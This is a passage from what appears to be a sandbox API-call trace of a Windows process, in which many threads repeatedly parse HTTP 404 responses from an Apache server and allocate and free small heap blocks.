hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea90 | out: hHeap=0x6a0000) returned 1 [0201.999] GetProcessHeap () returned 0x6a0000 [0201.999] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 199 os_tid = 0xc1c [0202.292] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0202.292] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:49 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0202.292] GetProcessHeap () returned 0x6a0000 [0202.292] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea90 [0202.292] GetProcessHeap () returned 0x6a0000 [0202.292] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea90 | out: hHeap=0x6a0000) returned 1 [0202.292] GetProcessHeap () returned 0x6a0000 [0202.293] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 200 os_tid = 0x6c4 [0202.654] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0202.655] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:49 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0202.655] GetProcessHeap () returned 0x6a0000 [0202.655] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea90 [0202.655] GetProcessHeap () returned 0x6a0000 [0202.655] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea90 | out: hHeap=0x6a0000) returned 1 [0202.655] GetProcessHeap () returned 0x6a0000 [0202.656] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 201 os_tid = 0x6c0 [0203.258] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0203.258] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:50 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0203.258] GetProcessHeap () returned 0x6a0000 [0203.258] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea78 [0203.258] GetProcessHeap () returned 0x6a0000 [0203.258] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea78 | out: hHeap=0x6a0000) returned 1 [0203.258] GetProcessHeap () returned 0x6a0000 [0203.259] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 202 os_tid = 0xc54 [0203.687] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0203.688] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:50 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0203.688] GetProcessHeap () returned 0x6a0000 [0203.688] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be8f8 [0203.688] GetProcessHeap () returned 0x6a0000 [0203.688] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be8f8 | out: hHeap=0x6a0000) returned 1 [0203.688] GetProcessHeap () returned 0x6a0000 [0203.688] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 203 os_tid = 0x680 [0204.141] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0204.142] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:51 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0204.142] GetProcessHeap () returned 0x6a0000 [0204.142] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be8f8 [0204.142] GetProcessHeap () returned 0x6a0000 [0204.142] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be8f8 | out: hHeap=0x6a0000) returned 1 [0204.142] GetProcessHeap () returned 0x6a0000 [0204.143] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 204 os_tid = 0x570 [0204.393] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0204.393] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:51 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0204.393] GetProcessHeap () returned 0x6a0000 [0204.393] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea90 [0204.393] GetProcessHeap () returned 0x6a0000 [0204.393] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea90 | out: hHeap=0x6a0000) returned 1 [0204.393] GetProcessHeap () returned 0x6a0000 [0204.394] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 205 os_tid = 0x754 [0204.568] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0204.568] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:51 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0204.568] GetProcessHeap () returned 0x6a0000 [0204.568] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea90 [0204.568] GetProcessHeap () returned 0x6a0000 [0204.568] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea90 | out: hHeap=0x6a0000) returned 1 [0204.568] GetProcessHeap () returned 0x6a0000 [0204.569] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 206 os_tid = 0x7a0 [0204.722] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0204.917] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:51 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0204.917] GetProcessHeap () returned 0x6a0000 [0204.917] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be7d8 [0204.917] GetProcessHeap () returned 0x6a0000 [0204.917] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be7d8 | out: hHeap=0x6a0000) returned 1 [0204.917] GetProcessHeap () returned 0x6a0000 [0204.917] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 207 os_tid = 0x1334 [0205.230] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0205.231] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:52 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0205.231] GetProcessHeap () returned 0x6a0000 [0205.231] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be9b8 [0205.231] GetProcessHeap () returned 0x6a0000 [0205.231] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be9b8 | out: hHeap=0x6a0000) returned 1 [0205.231] GetProcessHeap () returned 0x6a0000 [0205.232] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 208 os_tid = 0x8f8 [0205.425] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0205.426] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:52 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0205.426] GetProcessHeap () returned 0x6a0000 [0205.426] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be7d8 [0205.426] GetProcessHeap () returned 0x6a0000 [0205.426] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be7d8 | out: hHeap=0x6a0000) returned 1 [0205.426] GetProcessHeap () returned 0x6a0000 [0205.427] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 209 os_tid = 0x130c [0205.620] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0205.621] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:52 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0205.621] GetProcessHeap () returned 0x6a0000 [0205.621] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be7d8 [0205.621] GetProcessHeap () returned 0x6a0000 [0205.621] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be7d8 | out: hHeap=0x6a0000) returned 1 [0205.621] GetProcessHeap () returned 0x6a0000 [0205.621] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 210 os_tid = 0x8f4 [0205.961] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0205.961] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:52 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0205.961] GetProcessHeap () returned 0x6a0000 [0205.961] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be9b8 [0205.962] GetProcessHeap () returned 0x6a0000 [0205.962] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be9b8 | out: hHeap=0x6a0000) returned 1 [0205.962] GetProcessHeap () returned 0x6a0000 [0205.962] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 211 os_tid = 0x304 [0206.606] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0206.607] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:53 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0206.607] GetProcessHeap () returned 0x6a0000 [0206.607] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea90 [0206.607] GetProcessHeap () returned 0x6a0000 [0206.607] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea90 | out: hHeap=0x6a0000) returned 1 [0206.607] GetProcessHeap () returned 0x6a0000 [0206.608] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 212 os_tid = 0x133c [0206.886] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0206.886] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:53 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0206.886] GetProcessHeap () returned 0x6a0000 [0206.886] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be940 [0206.886] GetProcessHeap () returned 0x6a0000 [0206.886] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be940 | out: hHeap=0x6a0000) returned 1 [0206.887] GetProcessHeap () returned 0x6a0000 [0206.887] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 213 os_tid = 0xd70 [0207.303] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0207.304] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:54 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0207.304] GetProcessHeap () returned 0x6a0000 [0207.304] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea90 [0207.304] GetProcessHeap () returned 0x6a0000 [0207.304] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea90 | out: hHeap=0x6a0000) returned 1 [0207.304] GetProcessHeap () returned 0x6a0000 [0207.305] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 214 os_tid = 0x9cc [0207.522] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0207.522] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:54 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0207.522] GetProcessHeap () returned 0x6a0000 [0207.522] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea90 [0207.522] GetProcessHeap () returned 0x6a0000 [0207.523] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea90 | out: hHeap=0x6a0000) returned 1 [0207.523] GetProcessHeap () returned 0x6a0000 [0207.523] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 Thread: id = 215 os_tid = 0xb1c [0207.763] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0207.763] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:54 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0207.763] GetProcessHeap () returned 0x6a0000 [0207.763] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be940 [0207.764] GetProcessHeap () returned 0x6a0000 [0207.764] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be940 | out: hHeap=0x6a0000) returned 1 [0207.764] GetProcessHeap () returned 0x6a0000 [0207.764] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 Thread: id = 216 os_tid = 0x574 [0208.063] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0208.063] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:55 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0208.063] GetProcessHeap () returned 0x6a0000 [0208.063] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be940 [0208.063] GetProcessHeap () returned 0x6a0000 [0208.063] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be940 | out: hHeap=0x6a0000) returned 1 [0208.063] GetProcessHeap () returned 0x6a0000 [0208.064] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 Thread: id = 217 os_tid = 0xe94 [0208.311] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0208.312] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:55 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0208.312] GetProcessHeap () returned 0x6a0000 [0208.312] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea90 [0208.312] GetProcessHeap () returned 0x6a0000 [0208.312] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea90 | out: hHeap=0x6a0000) returned 1 [0208.312] GetProcessHeap () returned 0x6a0000 [0208.312] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 Thread: id = 218 os_tid = 0xec0 [0208.445] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0208.445] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:55 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0208.445] GetProcessHeap () returned 0x6a0000 [0208.445] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be9b8 [0208.445] GetProcessHeap () returned 0x6a0000 [0208.445] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be9b8 | out: hHeap=0x6a0000) returned 1 [0208.445] GetProcessHeap () returned 0x6a0000 [0208.446] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 Thread: id = 219 os_tid = 0x6bc [0208.888] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0208.889] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:55 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0208.889] GetProcessHeap () returned 0x6a0000 [0208.889] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea90 [0208.889] GetProcessHeap () returned 0x6a0000 [0208.889] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea90 | out: hHeap=0x6a0000) returned 1 [0208.889] GetProcessHeap () returned 0x6a0000 [0208.889] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 Thread: id = 220 os_tid = 0x67c [0209.110] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0209.111] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:56 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0209.111] GetProcessHeap () returned 0x6a0000 [0209.111] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea90 [0209.111] GetProcessHeap () returned 0x6a0000 [0209.111] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea90 | out: hHeap=0x6a0000) returned 1 [0209.111] GetProcessHeap () returned 0x6a0000 [0209.111] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 Thread: id = 221 os_tid = 0xb04 [0209.325] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0209.326] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:56 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0209.326] GetProcessHeap () returned 0x6a0000 [0209.326] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea90 [0209.326] GetProcessHeap () returned 0x6a0000 [0209.326] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea90 | out: hHeap=0x6a0000) returned 1 [0209.326] GetProcessHeap () returned 0x6a0000 [0209.327] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 Thread: id = 222 os_tid = 0x578 [0209.572] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0209.573] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:56 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0209.573] GetProcessHeap () returned 0x6a0000 [0209.573] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea90 [0209.573] GetProcessHeap () returned 0x6a0000 [0209.573] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea90 | out: hHeap=0x6a0000) returned 1 [0209.573] GetProcessHeap () returned 0x6a0000 [0209.573] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 Thread: id = 223 os_tid = 0x7f4 [0209.707] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0209.708] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:56 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0209.708] GetProcessHeap () returned 0x6a0000 [0209.708] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be9b8 [0209.708] GetProcessHeap () returned 0x6a0000 [0209.708] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be9b8 | out: hHeap=0x6a0000) returned 1 [0209.708] GetProcessHeap () returned 0x6a0000 [0209.708] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 Thread: id = 224 os_tid = 0xe70 [0209.898] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0209.898] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:56 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0209.898] GetProcessHeap () returned 0x6a0000 [0209.899] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea90 [0209.899] GetProcessHeap () returned 0x6a0000 [0209.899] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea90 | out: hHeap=0x6a0000) returned 1 [0209.899] GetProcessHeap () returned 0x6a0000 [0209.899] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 Thread: id = 225 os_tid = 0xf6c [0210.054] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0210.055] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:57 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0210.055] GetProcessHeap () returned 0x6a0000 [0210.055] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea90 [0210.055] GetProcessHeap () returned 0x6a0000 [0210.055] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea90 | out: hHeap=0x6a0000) returned 1 [0210.055] GetProcessHeap () returned 0x6a0000 [0210.055] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 Thread: id = 226 os_tid = 0xc88 [0210.325] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0210.325] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:57 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0210.326] GetProcessHeap () returned 0x6a0000 [0210.326] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea60 [0210.326] GetProcessHeap () returned 0x6a0000 [0210.326] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea60 | out: hHeap=0x6a0000) returned 1 [0210.326] GetProcessHeap () returned 0x6a0000 [0210.326] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 Thread: id = 227 os_tid = 0xf70 [0210.519] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0210.520] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:57 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0210.520] GetProcessHeap () returned 0x6a0000 [0210.520] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be9a0 [0210.520] GetProcessHeap () returned 0x6a0000 [0210.520] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be9a0 | out: hHeap=0x6a0000) returned 1 [0210.520] GetProcessHeap () returned 0x6a0000 [0210.521] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 Thread: id = 228 os_tid = 0xf68 [0210.730] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0210.730] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:57 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0210.730] GetProcessHeap () returned 0x6a0000 [0210.730] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be9a0 [0210.730] GetProcessHeap () returned 0x6a0000 [0210.731] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be9a0 | out: hHeap=0x6a0000) returned 1 [0210.731] GetProcessHeap () returned 0x6a0000 [0210.731] HeapFree (in: hHeap=0x6a0000, 